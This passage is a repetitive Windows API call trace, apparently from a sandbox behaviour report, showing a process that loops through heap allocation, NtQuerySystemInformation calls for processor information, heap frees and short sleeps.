SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.283] Sleep (dwMilliseconds=0x110) [0236.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.299] Sleep (dwMilliseconds=0x110) [0236.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.318] Sleep (dwMilliseconds=0x110) [0236.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.333] Sleep (dwMilliseconds=0x110) [0236.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.344] Sleep (dwMilliseconds=0x110) [0236.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.364] Sleep (dwMilliseconds=0x110) [0236.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.377] Sleep (dwMilliseconds=0x110) [0236.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.411] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.412] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.412] Sleep (dwMilliseconds=0x110) [0236.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.439] Sleep (dwMilliseconds=0x110) [0236.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.458] Sleep (dwMilliseconds=0x110) [0236.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.475] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.475] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.476] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.476] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.476] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.477] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.477] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.478] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.487] Sleep (dwMilliseconds=0x110) [0236.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.505] Sleep (dwMilliseconds=0x110) [0236.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.521] Sleep (dwMilliseconds=0x110) [0236.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.537] Sleep (dwMilliseconds=0x110) [0236.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.547] HeapFree (in: 